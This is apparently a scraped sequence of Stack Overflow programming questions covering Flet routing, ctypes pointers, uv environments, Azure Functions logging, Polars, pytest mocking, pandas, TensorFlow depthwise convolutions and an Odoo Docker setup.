self.window_height = window_height
self.login_on_click = login_on_click
self.route = route
def update_layout(self):
"""
Updates the layout by incrementally changing the progress bar value and updating the background color of the
top container and the login button every 10% of progress.
This function iterates from 0 to 100, updating the progress bar's value and sleeping for 0.05 seconds
between each increment. When the progress reaches a multiple of 10, it changes the background color of
the top container and the login button based on a predefined list of green shades. After reaching 100%,
it resets the progress.
"""
colors = [ft.colors.GREEN_50, ft.colors.GREEN_100, ft.colors.GREEN_200, ft.colors.GREEN_300, ft.colors.GREEN_400, ft.colors.GREEN_500, ft.colors.GREEN_600, ft.colors.GREEN_700, ft.colors.GREEN_800, ft.colors.GREEN_900]
val=0
while val < 101:
self.pb.value = val * 0.01
time.sleep(0.05)
#update container bgcolor every 10%
mod = val % 10
if mod == 0.0:
self.topContainer.bgcolor = colors[int(val/10) - 1]
self.loginButton.style = ft.ButtonStyle(bgcolor=colors[int(val/10) - 1])
#update val value
val += 1
if val == 100:
val=0
#update the page
self.update()
def did_mount(self):
self.update_layout()
def build(self):
self.topContainer = ft.Container(
bgcolor=ft.colors.GREEN,
width=self.window_width,
height=self.window_height * 0.25,
)
self.pb = ft.ProgressBar()
self.loginButton=ft.FilledButton(text="LOGIN", on_click = self.login_on_click)
self.bottomContainer = ft.Container(
width=self.window_width,
height=self.window_height * 0.75,
content=ft.Column(
[self.loginButton],
alignment="CENTER",
horizontal_alignment="CENTER",
),
)
view = ft.View(
route=self.route,
padding=0,
horizontal_alignment="center",
vertical_alignment="top",
controls=[ft.Column([self.topContainer, self.pb, self.bottomContainer], spacing=0,)],
# theme=ft.Theme(color_scheme_seed = ft.colors.GREEN),
# theme_mode="light",
)
return view
class LoginView(ft.View):
def __init__(self, window_width, window_height, route, on_click):
super().__init__()
self.window_width = window_width
self.window_height = window_height
self.route = route
self.back_on_click = on_click
def build(self):
view = ft.View(
route=self.route,
padding=0,
horizontal_alignment="center",
vertical_alignment="top",
controls=[ft.Column([ft.FilledButton(text="BACK", on_click=self.back_on_click)], )],
# theme=ft.Theme(color_scheme_seed = ft.colors.GREEN),
# theme_mode="light",
)
return view
def main(page: ft.Page):
def route_change(route):
page.views.clear()
page.views.append(welcome_view)
if page.route == "/login_view":
page.views.append(login_view)
page.update()
def view_pop(view):
if page.route == "/login_view":
page.go("/")
page.theme = ft.Theme(color_scheme_seed = ft.colors.GREEN) #BLUE_200
page.theme_mode = "light"
page.window_height = 700
page.window_width = 400
page.window_resizable = False
page.window_maximizable = False
page.title = "Mobile App UI Example"
welcome_view = WelcomeView(window_height=page.window_width,
window_width=page.window_height,
route="/",
login_on_click=lambda _: page.go("/login_view"),
)
login_view = LoginView(window_height=page.window_width,
window_width=page.window_height,
route="/login_view",
on_click=lambda _: page.go("/")
)
page.on_route_change = route_change
page.on_view_pop = view_pop
page.go(page.route)
ft.app(target=main, assets_dir="assets")
</code></pre>
<p>Could someone give some hints about performing routing with views defined outside the main function? Thank you</p>
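<p>For context, the "Unknown control view" symptom might come from the fact that <code>build()</code> returns another <code>ft.View</code>, so a nested view ends up inside the page's view list. One pattern that avoids that (only a trimmed-down sketch, not necessarily the only fix) is to configure the subclass itself and put the children in <code>self.controls</code>:</p>
<pre class="lang-py prettyprint-override"><code>import flet as ft

class WelcomeView(ft.View):
    def __init__(self, route, login_on_click):
        # configure this View directly instead of returning a new ft.View from build()
        super().__init__(route=route, padding=0, horizontal_alignment="center")
        self.login_button = ft.FilledButton(text="LOGIN", on_click=login_on_click)
        self.controls = [ft.Column([self.login_button])]
</code></pre>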
|
<python><flutter><flet>
|
2025-01-17 16:12:51
| 1
| 421
|
eljamba
|
79,365,281
| 3,336,423
|
How to correctly initialize ctypes char***?
|
<p>I'm using <code>ctypes</code> to call C code from Python.</p>
<p>The C function I need to call takes a <code>char***</code>, so it is bound using a <code>ctypes.POINTER(ctypes.POINTER(ctypes.c_char))</code>.</p>
<p>I don't understand how I should safely create and initialize such objects, because if I create one and immediately try to iterate over it, the Python program crashes:</p>
<pre><code>import ctypes
names = ctypes.POINTER(ctypes.POINTER(ctypes.c_char))()
if names != None:
for name in names:
pass
</code></pre>
<p>Error is:</p>
<pre><code>Traceback (most recent call last):
File "example_sdetests_lib_bind_python_string_array.py", line 6, in <module>
for name in names:
ValueError: NULL pointer access
</code></pre>
<p>How can I safely check a <code>ctypes.POINTER(ctypes.POINTER(ctypes.c_char))</code> is NULL or not?</p>
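<p>For reference, a NULL <code>ctypes</code> pointer evaluates as <code>False</code>, so plain truth-testing is the usual guard (comparing with <code>!= None</code> does not catch the NULL case, as the traceback above shows). A minimal sketch:</p>
<pre class="lang-py prettyprint-override"><code>import ctypes

names = ctypes.POINTER(ctypes.POINTER(ctypes.c_char))()

if names:               # False while the pointer is NULL
    first = names[0]    # only dereference once it actually points somewhere
else:
    print("names is NULL, nothing to iterate")
</code></pre>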
|
<python><ctypes><python-bindings>
|
2025-01-17 15:33:22
| 1
| 21,904
|
jpo38
|
79,365,086
| 1,192,393
|
Can I have different virtual environments in a project managed by uv?
|
<p>On a Windows machine, I'm developing a Python project that I manage using <code>uv</code>. I run the unit tests with <code>uv run pytest</code>, and <code>uv</code> automatically creates a virtual environment in <code>.venv</code>. So far, so good.</p>
<p>But every now and then, I want to run the unit tests - or other commands - in Linux (from the same project source directory). In my case, this means WSL, but it could also be a VM using a shared folder or a network share. The problem is that the virtual environment is platform specific, so <code>uv run pytest</code> reports an error that the virtual environment is invalid.</p>
<p><strong>Is it possible to configure <code>uv</code> to use a different name for the project's virtual environment - e. g., <code>.venv_linux</code>?</strong></p>
<p>As a workaround, I could move the <code>.venv</code> folder out of the way and let <code>uv</code> on Linux create its own <code>.venv</code>. But I'd have to do that every time I switch between the two, and that would be cumbersome. I also couldn't do this while a command from the project is still running.</p>
|
<python><python-venv><uv>
|
2025-01-17 14:37:02
| 2
| 411
|
Martin
|
79,365,048
| 7,007,547
|
How to get the Exception (Message and StackStrace) of a Python Azure Function
|
<p>With the following Azure Function (<code>config.nonsense</code> is not defined):</p>
<pre><code>import azure.functions as func
import logging
import zsbiconfig
# import triggerfunc
app = func.FunctionApp()
@app.timer_trigger(schedule="0 */1 * * * *", arg_name="myTimer", run_on_startup=True,
use_monitor=False)
def zsdbi(myTimer: func.TimerRequest) -> None:
if myTimer.past_due:
logging.info('The timer is past due!')
logging.info('27 Python timer trigger function executed.')
config = zsbiconfig.MyConfig(azure=True)
print('config.ftp_host:', config.ftp_host)
print('config.ftp_username:', config.ftp_username)
print('config.ftp_password:', config.ftp_password)
print('config.ftp_nonsense:', config.nonsense) # This will produce an Exception
# err = triggerfunc.triggerfunc(config)
return
</code></pre>
<p>I produce the following Error (Shown here is the Monitoring LogStream):</p>
<pre><code>2025-01-17T13:45:00Z [Verbose] Sending invocation id: 'f65a61af-e12a-4bfe-8bd2-7e30fee4eede
2025-01-17T13:45:00Z [Verbose] Posting invocation id:f65a61af-e12a-4bfe-8bd2-7e30fee4eede on workerId:3ec07702-7f0c-4a61-a0e7-57e542651161
2025-01-17T13:45:00Z [Information] 27 Python timer trigger function executed.
2025-01-17T13:45:00Z [Error] Executed 'Functions.zsdbi' (Failed, Id=f65a61af-e12a-4bfe-8bd2-7e30fee4eede, Duration=9ms)
</code></pre>
<p>I cannot figure out how to get the full stack trace and error message of this exception in Application Insights. Here is my host.json:</p>
<pre><code>{
"version": "2.0",
"logging": {
"applicationInsights": {
"samplingSettings": {
"isEnabled": true,
"excludedTypes": "Request"
}
}
},
"extensionBundle": {
"id": "Microsoft.Azure.Functions.ExtensionBundle",
"version": "[4.*, 5.0.0)"
}
}
</code></pre>
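<p>Independently of the host.json settings, one pattern that usually surfaces the message and traceback in the log stream / trace telemetry is wrapping the function body and calling <code>logging.exception</code> before re-raising. A minimal sketch of that pattern (reusing the module from the question):</p>
<pre class="lang-py prettyprint-override"><code>import logging
import zsbiconfig

def zsdbi_body():
    try:
        config = zsbiconfig.MyConfig(azure=True)
        print('config.ftp_nonsense:', config.nonsense)   # raises AttributeError
    except Exception:
        logging.exception("zsdbi failed")   # ERROR record with the full traceback attached
        raise                               # re-raise so the invocation is still marked failed
</code></pre>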
<p><strong>Edit 1 <code>zsbiconfig.py</code></strong></p>
<pre><code>import os
# from azure.identity import DefaultAzureCredential
# from azure.keyvault.secrets import SecretClient
class MyConfig:
def __init__(self, ftp_host=None, ftp_username=None, ftp_password=None,
sharepoint_url=None, sharepoint_clientid=None, sharepoint_clientsecret=None, azure=False):
self._ftp_host = ftp_host
self._ftp_username = ftp_username
self._ftp_password = ftp_password
self._sharepoint_url = sharepoint_url
self._sharepoint_clientid = sharepoint_clientid
self._sharepoint_clientsecret = sharepoint_clientsecret
self._azure = azure
self._env_ftp_host = os.getenv('FTP_HOST')
self._env_ftp_username = os.getenv('FTP_USERNAME')
self._env_ftp_password = os.getenv('FTP_PASSWORD')
self._env_sharepoint_url = os.getenv('SHAREPOINT_URL')
self._env_sharepoint_clientid = os.getenv('SHAREPOINT_CLIENTID')
self._env_sharepoint_clientsecret = os.getenv('SHAREPOINT_CLIENTSECRET')
return
</code></pre>
|
<python><azure-functions><azure-application-insights>
|
2025-01-17 14:24:07
| 1
| 1,140
|
mbieren
|
79,365,034
| 13,175,203
|
How to recycle a list to build a new column in Polars?
|
<p>How can I create the <code>type</code> column by recycling a two-element list <code>["lat","lon"]</code>?</p>
<div class="s-table-container"><table class="s-table">
<thead>
<tr>
<th>adresse</th>
<th>coord</th>
<th>type</th>
</tr>
</thead>
<tbody>
<tr>
<td>"place 1"</td>
<td>48.943837</td>
<td><strong>lat</strong></td>
</tr>
<tr>
<td>"place 1"</td>
<td>2.387917</td>
<td><strong>lon</strong></td>
</tr>
<tr>
<td>"place 2"</td>
<td>37.843837</td>
<td><strong>lat</strong></td>
</tr>
<tr>
<td>"place 2"</td>
<td>6.387917</td>
<td><strong>lon</strong></td>
</tr>
</tbody>
</table></div>
<p>As it would be automatically done in R with <code>d$type <- c("lat","lon")</code></p>
<p>Reprex :</p>
<pre class="lang-py prettyprint-override"><code>import polars as pl
d0 = pl.DataFrame(
{
"adresse": ["place 1", "place 2"],
"coord": [[48.943837, 2.387917], [37.843837, 6.387917]],
}
)
d1 = d0.explode("coord")
</code></pre>
<p>What I tried:</p>
<pre class="lang-py prettyprint-override"><code>d1 = d1.with_columns(type=pl.Series(["1","2"]))
# ShapeError: unable to add a column of length 2 to a DataFrame of height 4
d1 = d1.join(pl.DataFrame({"id":["1", "2"]}), how="cross")
# logically, 8 rows instead of 4
</code></pre>
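<p>For the record, a sketch of one way to build that column, assuming every <code>coord</code> list has exactly two elements so the labels can simply be tiled to the exploded height:</p>
<pre class="lang-py prettyprint-override"><code>import polars as pl

labels = ["lat", "lon"]
d1 = d0.explode("coord").with_columns(
    type=pl.Series(labels * d0.height)   # one "lat"/"lon" pair per original row
)
</code></pre>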
|
<python><dataframe><python-polars>
|
2025-01-17 14:20:56
| 3
| 491
|
Samuel Allain
|
79,364,990
| 10,691,106
|
Specifying a relationship between *args of *Ts and *args of type[T] over Ts?
|
<p>Consider the following example:</p>
<pre class="lang-py prettyprint-override"><code>class Example:
def __init__(self, *arg_types) -> None:
...
def do_work(self, *arg_values) -> Any:
...
</code></pre>
<p>In this demo, <code>arg_types</code> is some list of object types. For example, I might instantiate:</p>
<pre class="lang-py prettyprint-override"><code>myEx = Example(int, str)
</code></pre>
<p>I would then expect that <code>do_work</code> expects one integer and one string:</p>
<pre class="lang-py prettyprint-override"><code>myEx.do_work(42, "forty two")
</code></pre>
<p>and that <code>myEx</code> is of type <code>Example[int, str]</code>.</p>
<p>My initial attempt gave something like</p>
<pre class="lang-py prettyprint-override"><code>class Example[*Ts]:
def __init__(self, *arg_type: *Ts) -> None:
...
def do_work(self, *arg_values: *Ts) -> Any:
...
</code></pre>
<p>However, this has the obvious issue that, by continuing the example above, <code>myEx.do_work(42, "forty two")</code> gives an error, as <code>42</code> is <code>int</code> and not <code>type[int]</code>, and similarly for the string argument.</p>
<p>I have had to do a bit of variadic type hinting in the past, but this one doesn't seem possible to express with the type hinting Python can provide.</p>
<p>Is there a way to do this?</p>
<hr />
<p>Minor edit:</p>
<p>I should also specify that I explored attempting some kind of type alias</p>
<pre><code>type TypeT[T] = type[T]
</code></pre>
<p>and then parameterising my class on T. However, based on how <code>TypeVarTuple</code>s work, each <code>*arg</code> would need to be the same <code>T</code>, which is where the complication arises.</p>
|
<python><python-typing>
|
2025-01-17 14:06:31
| 0
| 339
|
TimeTravelPenguin
|
79,364,926
| 2,302,262
|
aggregate or split pytest fixtures
|
<p>Two related <code>pytest</code> questions:</p>
<h1>Split fixture into individual values</h1>
<p>I have a fixture which is an iterable and which is tested in a certain test. This works. However, I also have a test which wants to test the individual values - I don't know how to do this.</p>
<p>For example, how can I write the <code>student</code> fixture such that it returns each of the elements of <code>klass</code>?</p>
<pre class="lang-py prettyprint-override"><code>@pytest.fixture
def klass() -> list[str]:
return ['alice', 'bob', 'claire']
@pytest.fixture
def student(klass) -> str: # HERE IS THE QUESTION
#code that returns each student in the klass individually
def test_klass(klass): # ran once
assert len(klass) > 0
def test_student(student): # ran 3 times
assert isinstance(student, str)
</code></pre>
<h1>Combine individual fixture values into single fixture</h1>
<p>The inverse problem occurs if I want to specify the students and combine them into a klass (the same test functions apply as above):</p>
<pre class="lang-py prettyprint-override"><code>@pytest.fixture(params = ['alice', 'bob', 'claire'])
def student(request) -> str:
return request.param
@pytest.fixture
def klass(student) -> list[str]: # HERE IS THE QUESTION
#code that returns the list with all values for student
</code></pre>
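<p>One sketch that covers the "combine" direction is to keep the raw values in a module-level constant and feed it both to the parametrized fixture and to the aggregate one. This sidesteps the fact that a fixture cannot easily enumerate another fixture's parametrized values:</p>
<pre class="lang-py prettyprint-override"><code>import pytest

STUDENTS = ['alice', 'bob', 'claire']

@pytest.fixture(params=STUDENTS)
def student(request) -> str:
    return request.param          # test_student runs once per name

@pytest.fixture
def klass() -> list[str]:
    return list(STUDENTS)         # test_klass runs once with the full list
</code></pre>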
|
<python><pytest>
|
2025-01-17 13:41:02
| 1
| 2,294
|
ElRudi
|
79,364,853
| 15,001,463
|
Inheriting from too many abstract classes?
|
<p>I am trying to apply the <a href="https://en.wikipedia.org/wiki/Don%27t_repeat_yourself" rel="nofollow noreferrer">DRY</a> principle to toy plotting classes as an intellectual exercise for improving my understanding of OOP (currently reading <a href="https://rads.stackoverflow.com/amzn/click/com/1801077266" rel="nofollow noreferrer">Python Object Oriented programming</a>), but intuitively it seems like an increasingly deep inheritance hierarchy might lead to a more complicated code base (especially since I have read that composition seems to be favored over inheritance, see <a href="https://en.wikipedia.org/wiki/Composition_over_inheritance" rel="nofollow noreferrer">Composition over inheritance wiki</a>). It seems like such a toy library could potentially end up with wayyyyy too many abstract classes like <code>AbstractMonthlyMultiPanelPlot</code> or <code>AbstractSeasonalPlot</code>, and so on, for arbitrary plot types to accommodate different input data.</p>
<p>Is there a more pythonic way about handling the below problem that perhaps I am missing? Am I violating some sort of design principle that I have either mis-interpreted or perhaps just completely missed?</p>
<pre class="lang-py prettyprint-override"><code>from abc import abstractmethod, ABC
from numpy import ndarray
from typing import List, Tuple
import matplotlib.pyplot as plt
class AbstractPlot(ABC):
@abstractmethod
def plot(self):
raise NotImplementedError
class AbstractMonthlyPlot(AbstractPlot):
@abstractmethod
def _plot_for_month(self, ax, data):
raise NotImplementedError
@property
def n_months(self):
"""number of months in a year"""
return 12
def plot(self, month_to_data: List[Tuple[ndarray]]):
fig, axs = plt.subplots(self.n_months, 1)
for month in range(self.n_months):
self._plot_for_month(ax=axs[month], data=month_to_data[month])
class Contour(AbstractMonthlyPlot):
def _plot_for_month(self, ax, data):
ax.contourf(*data)
class Linear(AbstractMonthlyPlot):
def _plot_for_month(self, ax, data):
ax.plot(*data)
</code></pre>
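<p>For comparison, here is roughly what a composition-based variant of the same toy could look like, with the per-month drawing routine injected instead of inherited (only a sketch, not a recommendation either way):</p>
<pre class="lang-py prettyprint-override"><code>from dataclasses import dataclass
from typing import Callable, List, Tuple
from numpy import ndarray
import matplotlib.pyplot as plt

@dataclass
class MonthlyPlot:
    plot_for_month: Callable[..., None]   # e.g. lambda ax, data: ax.contourf(*data)
    n_months: int = 12

    def plot(self, month_to_data: List[Tuple[ndarray, ...]]):
        fig, axs = plt.subplots(self.n_months, 1)
        for month in range(self.n_months):
            self.plot_for_month(axs[month], month_to_data[month])

contour_plot = MonthlyPlot(lambda ax, data: ax.contourf(*data))
linear_plot = MonthlyPlot(lambda ax, data: ax.plot(*data))
</code></pre>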
|
<python><oop>
|
2025-01-17 13:10:17
| 1
| 714
|
Jared
|
79,364,747
| 7,766,158
|
pre-commit fails with ModuleNotFoundError: No module named 'yaml'
|
<p>I am using pre-commit. In one of the hooks, I use a python script that imports the <code>yaml</code> library.</p>
<p>However, when I try to commit something, I get the following error on this hook :</p>
<pre><code>ModuleNotFoundError: No module named 'yaml'
</code></pre>
<p>I don't understand what the issue is here, as <code>pyyaml</code> is properly importable in Python:</p>
<pre><code>$ python3
Python 3.12.3 (main, Nov 6 2024, 18:32:19) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import yaml
>>>
</code></pre>
<p>Here is my .pre-commit-config.yml :</p>
<pre><code>repos:
# python hooks
- repo: local
hooks:
- id: yaml-arrays-sort
name: YAML Arrays Sort
description: Sort arrays in YAML files
entry: python scripts/yaml-arrays-sort.py
pass_filenames: false
language: python
</code></pre>
|
<python><pre-commit-hook><pre-commit><pre-commit.com>
|
2025-01-17 12:25:12
| 1
| 1,931
|
Nakeuh
|
79,364,688
| 5,775,358
|
pytest mock two instances of pathlib
|
<p>I have the following function which I want to test. I do not want to use <code>tmp_path</code> so I try to mock everything, using pytest-mock.</p>
<pre class="lang-py prettyprint-override"><code>import pytest
import pathlib
class SecondFileError(Exception):
def __init__(self, message):
super().__init__(message)
def check_files(file: pathlib.Path) -> tuple[pathlib.Path, pathlib.Path]:
# check if file exists:
if not file.exists():
raise FileNotFoundError(f"File {file} does not exist")
# second file (these files should always be together)
second_file = file.parent / f"{file.stem}_second{file.suffix}"
if not second_file.exists():
raise SecondFileError(f"{second_file} not found")
return (file, second_file)
def test_check_file_correct(mocker):
file = pathlib.Path("test.txt")
second_file = pathlib.Path("test_second.txt")
mocker.patch("pathlib.Path.exists", return_value=True)
res = check_files(file)
assert res[0] == file
assert res[1] == second_file
def test_check_no_file(mocker):
file = pathlib.Path("test.txt")
mocker.patch("pathlib.Path.exists", return_value=False)
with pytest.raises(FileNotFoundError):
check_files(file)
</code></pre>
<p>This works fine. I would also like to test the case where only the first file exists, without the second file.</p>
<p>What I tried is this:</p>
<pre><code>def test_with_file_without_second_file(mocker):
file = pathlib.Path("test.txt")
file.exists = mocker.MagicMock(exists=True)
with pytest.raises(SecondFileError):
check_files(file)
>>> AttributeError: 'WindowsPath' object attribute 'exists' is read-only
def test_with_file_without_second_file(mocker):
file = pathlib.Path("test.txt")
# file.exists = mocker.MagicMock(exists=True)
mock_exists = mocker.patch.object(file, "exists", return_value=True)
with pytest.raises(SecondFileError):
check_files(file)
>>> AttributeError: 'WindowsPath' object attribute 'exists' is read-only
def test_with_file_without_second_file(mocker):
file = pathlib.Path("test.txt")
mocker.patch.object(
file,
"__getattr__",
side_effect=lambda attr: True if attr == "exists" else AttributeError,
)
with pytest.raises(SecondFileError):
check_files(file)
>>> AttributeError: test.txt does not have the attribute '__getattr__'
</code></pre>
<p>And a lot of other options, but it all comes down to the read-only error. A lot of examples on the internet show how to patch the method on the class so it always returns True, but I would like to mock it on a specific instance of the <code>pathlib.Path</code> class.</p>
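<p>For what it's worth, one pattern that avoids touching the instance at all is to patch <code>pathlib.Path.exists</code> on the class with <code>autospec=True</code>, so the mock receives the <code>Path</code> instance as its first argument and can answer differently per path. A sketch (reusing the imports and functions from the snippet above):</p>
<pre class="lang-py prettyprint-override"><code>def test_with_file_without_second_file(mocker):
    file = pathlib.Path("test.txt")
    mocker.patch(
        "pathlib.Path.exists",
        autospec=True,
        side_effect=lambda self: self.name == "test.txt",  # only the first file "exists"
    )
    with pytest.raises(SecondFileError):
        check_files(file)
</code></pre>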
|
<python><mocking><pytest><pathlib><pytest-mock>
|
2025-01-17 12:00:01
| 0
| 2,406
|
3dSpatialUser
|
79,364,551
| 7,959,614
|
How to subtract pd.DataFrameGroupBy-objects from each other
|
<p>I have the following <code>pd.DataFrame</code></p>
<pre><code>match_id player_id round points A B C D E
5890 3750 1 10 0 0 0 3 1
5890 3750 2 10 0 0 0 1 0
5890 3750 3 10 0 8 0 0 1
5890 2366 1 9 0 0 0 5 0
5890 2366 2 9 0 0 0 5 0
5890 2366 3 9 0 0 0 2 0
</code></pre>
<p>I want to subtract the values of A, B, C, D and E of the two players and create two new columns that represent the number of points of the two players.</p>
<p>My desired output looks as follows:</p>
<pre><code>match_id round points_home points_away A B C D E
5890 1 10 9 0 0 0 -2 1
5890 2 10 9 0 0 0 -4 0
5890 3 10 9 0 8 0 -2 1
</code></pre>
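<p>A minimal sketch of one way to get there, assuming the first row of each <code>(match_id, round)</code> group is the home player and the second one the away player:</p>
<pre class="lang-py prettyprint-override"><code>cols = ["A", "B", "C", "D", "E"]
g = df.groupby(["match_id", "round"], sort=False)

out = g.agg(points_home=("points", "first"), points_away=("points", "last"))
out[cols] = g[cols].first() - g[cols].last()   # home minus away, aligned on the group keys
out = out.reset_index()
</code></pre>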
<p>Please advise.</p>
|
<python><pandas>
|
2025-01-17 11:05:08
| 1
| 406
|
HJA24
|
79,364,440
| 7,677,894
|
How to achieve unequal stride of dw-conv with equal stride dw-conv?
|
<p>It seems that unequal height and width strides are not supported in <code>tf.nn.depthwise_conv2d</code>. Can I achieve the same effect with an equal-stride convolution combined with other layer operations?</p>
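<p>One workaround sketch, assuming <code>'VALID'</code> padding: run the depthwise convolution with equal (unit) strides and then drop the unwanted output positions with strided slicing, which produces the same values an unequal stride would have kept (<code>x</code> and <code>filters</code> stand for the usual NHWC input and depthwise filter tensors):</p>
<pre class="lang-py prettyprint-override"><code>import tensorflow as tf

# emulate strides of (1, 2): equal-stride conv, then keep every 2nd column of the output
y = tf.nn.depthwise_conv2d(x, filters, strides=[1, 1, 1, 1], padding="VALID")
y = y[:, ::1, ::2, :]
</code></pre>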
|
<python><tensorflow><deep-learning>
|
2025-01-17 10:28:10
| 0
| 983
|
Ink
|
79,364,338
| 2,859,206
|
How to label or rename bin ranges in a series output from value count
|
<p>In a series or df column, I want to count the number of values that fit within predefined bins (easy) and meaningfully label the bin values (problem).</p>
<pre class="lang-py prettyprint-override"><code>import pandas as pd
data = [{'A': 1, 'B': "Jim"}, {'A': 5, 'B': "Jim"}, {'A': 2, 'B': "Bob"}, {'A': 3, 'B': "Bob"}]
df = pd.DataFrame(data)
mBins = [-1, 2, 4, 6]
mLabels = ["0-2", "3-4", "5-6"]
simple_VC = df["A"].value_counts(bins=mBins)
</code></pre>
<pre class="lang-none prettyprint-override"><code>Out[25]: # ugly bin values
(-1.001, 2.0] 2
(2.0, 4.0] 1
(4.0, 6.0] 1
# Wanted more meaningful bin values:
0-2 2
3-4 1
5-6 1
</code></pre>
<p>I've tried using pd.cut, which allows me to label the bins, but I'm not sure how to use this in a value count. I've also tried to rename, but I don't know how to specify values like (4.0, 6.0], which are neither text or non-text.</p>
<p>How do I label the binned value counts - if possible during the value count, and how to rename bin ranges?</p>
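<p>A minimal sketch of the <code>pd.cut</code> route, which already attaches the readable labels to the counts:</p>
<pre class="lang-py prettyprint-override"><code>labelled_VC = pd.cut(df["A"], bins=mBins, labels=mLabels).value_counts(sort=False)
# 0-2    2
# 3-4    1
# 5-6    1
</code></pre>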
|
<python><pandas>
|
2025-01-17 09:55:56
| 2
| 2,490
|
DrWhat
|
79,364,336
| 2,966,723
|
How to get a python function to work on an np.array or a float, with conditional logic
|
<p>I have a function that I'd like to take numpy arrays or floats as input. I want to keep doing an operation until some measure of error is less than a threshold.</p>
<p>A simple example would be the following to divide a number or array by 2 until it's below a threshold (if a float), or until it's maximum is below a threshold (if an array).</p>
<pre><code>def f(x): #float version
while x>1e-5:
x = x/2
return x
def f(x): #np array version
while max(x)>1e-5:
x = x/2
return x
</code></pre>
<p>Unfortunately, <code>max</code> won't work if I've got something that is not iterable, and <code>x>1e-5</code> can't be used as a <code>while</code> condition if <code>x</code> is an array. I can't find anything to do this, except perhaps <code>vectorize</code>, but that seems less efficient than I would want. How can I get a single function to handle both cases?</p>
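<p>For the record, a sketch of a single-function version: <code>np.max</code> accepts a plain float as well as an array, so the loop condition works for both without <code>vectorize</code>:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np

def f(x):
    while np.max(x) > 1e-5:   # np.max(3.0) == 3.0, so scalars work too
        x = x / 2
    return x
</code></pre>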
|
<python><numpy><overloading>
|
2025-01-17 09:55:17
| 2
| 24,012
|
Joel
|
79,364,331
| 7,677,894
|
Unequal width and height of stride in tf.nn.depthwise_conv2d not supported?
|
<p>Is that right?</p>
<p>If yes, how can I convert pretrained weights that were trained with unequal strides to a TensorFlow <code>dw-conv</code> combined with some other <code>ops</code>?</p>
<p>THX</p>
|
<python><tensorflow><deep-learning><tensorflow2.0>
|
2025-01-17 09:52:57
| 0
| 983
|
Ink
|
79,364,302
| 4,979,809
|
How to know in advance what format/columns POST API is expecting?
|
<p>I am trying to send some data to an API.</p>
<p>All information I have is:</p>
<p><strong>ImportUsersFile</strong></p>
<p><strong>Verbs</strong>
POST</p>
<p><strong>Requires authentication</strong>
False</p>
<p><strong>Parameters</strong></p>
<ul>
<li>jobName: string</li>
<li>token: CancellationToken</li>
</ul>
<p>The information is given in their site/api.mvc/</p>
<p>Is there any way of knowing, in advance, what format/columns this is expecting?</p>
<p>I wanted to use <strong>ImportUsersFile</strong> to send some user data to it. The API is from the company signinworkspace.</p>
|
<python><post><databricks>
|
2025-01-17 09:43:24
| 0
| 706
|
Chicago1988
|
79,364,092
| 11,505,151
|
Odoo not working - no CSS on login page and blank screen post-login
|
<p>I cloned a project from GitLab that uses Docker to set up multiple services, including Odoo 16, PostgreSQL, a FastAPI backend, and a Next.js frontend.</p>
<p>The project works perfectly on my colleague's machine, but on my setup (macOS), and on another colleague's machine, we are facing the same issue:</p>
<p>The containers start successfully, and I can configure the database connection without any issues. However, when I try to access Odoo at http://localhost:8069/, I encounter the following problem:</p>
<ul>
<li>The login page loads without CSS.</li>
<li>After entering valid credentials, I'm redirected to http://localhost:8069/web, but the page is completely blank.</li>
</ul>
<p>What I Tried:</p>
<p>I attempted several fixes, but none resolved the issue:</p>
<p>1- Regenerating Odoo assets:</p>
<pre><code>docker exec -it odoo bash
odoo --update=all --stop-after-init
docker-compose restart odoo
</code></pre>
<p>2- Checking permissions for mounted volumes:</p>
<pre><code>sudo chmod -R 777 odoo_data
sudo chmod -R 777 odoo_source
sudo chmod -R 777 odoo_custom_addons
</code></pre>
<p>3- Clearing browser cache and trying in incognito mode.
4- Verifying Docker logs for errors (nothing unusual found).</p>
<p>docker-compose.yml (Relevant parts):</p>
<pre><code>services:
postgres_db:
image: postgres:15
container_name: postgres_db
environment:
POSTGRES_USER: postgres
POSTGRES_PASSWORD: password
POSTGRES_DB: xiptelecom
volumes:
- postgres_data:/var/lib/postgresql/data
- ./init_postgres_odoo.sql:/docker-entrypoint-initdb.d/init_postgres_odoo.sql
ports:
- "5432:5432"
pgadmin:
image: dpage/pgadmin4
container_name: pgadmin4_container
restart: always
ports:
- "5050:80"
environment:
PGADMIN_DEFAULT_EMAIL: admin@admin.com
PGADMIN_DEFAULT_PASSWORD: admin
volumes:
- pgadmin_data:/var/lib/pgadmin
backend:
build:
context: ./Backend
container_name: backend
command: uvicorn main:app --host 0.0.0.0 --port 8080 --reload
volumes:
- ./Backend:/app
ports:
- "8080:8080"
depends_on:
- postgres_db
frontend:
build:
context: ./Frontend
container_name: frontend
command: "npm run dev"
volumes:
- ./Frontend:/app
ports:
- "3000:3000"
depends_on:
- backend
odoo:
image: odoo:16
container_name: odoo
depends_on:
- postgres_db
ports:
- "8069:8069"
environment:
HOST: postgres_db
USER: odoo_user # utilisateur postgres sql
PASSWORD: odoo_password # mot de passe postgres sql
DATABASE: odoo # nom de la bdd pour Odoo
MASTER_PASSWORD: admin
volumes:
- odoo_data:/var/lib/odoo
- ./odoo_source:/mnt/odoo_source # monte le dossier local
- ./odoo.conf:/etc/odoo/odoo.conf # Ajout de la configuration locale
- ./odoo_custom_addons:/mnt/extra-addons # répertoire local pour les modules Odoo personnalisés
volumes:
postgres_data:
pgadmin_data:
odoo_data:
</code></pre>
<p>odoo.conf:</p>
<pre><code>[options]
; Infos de connexion à la bdd
db_host = postgres_db
db_port = 5432
db_user = odoo_user
db_password = odoo_password
db_name = odoo
; Configuration des modules
addons_path = /mnt/odoo_source/addons,/mnt/extra-addons
; Autres paramètres
data_dir = /var/lib/odoo
admin_passwd = $pbkdf2-sha512$600000$DAEAQKjV2jsHYKwVIoQwpg$ScuSHwYyRuGfJqbi65UUajG/kN7E5DxptFq1S.hwATMA7o/Mfx7M2dftb4VLDYmR5T1SVgCRaAcd8iHZCJ2QKQ
xmlrpc_port = 8069
longpolling_port = 8072
logfile = /var/log/odoo/odoo.log
</code></pre>
<p>==> Logs & Errors:</p>
<p>No critical errors appear in the logs. The Odoo service starts without issues, and I can even configure the database.</p>
<p>Questions:</p>
<ol>
<li>Why is the login page missing CSS?</li>
<li>Why do I get a blank page after login (http://localhost:8069/web)?</li>
<li>How can I debug and resolve this issue?</li>
</ol>
<p>Any insights or troubleshooting steps would be greatly appreciated!</p>
<p><a href="https://i.sstatic.net/xFoaBf8i.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/xFoaBf8i.png" alt="no CSS on login page" /></a></p>
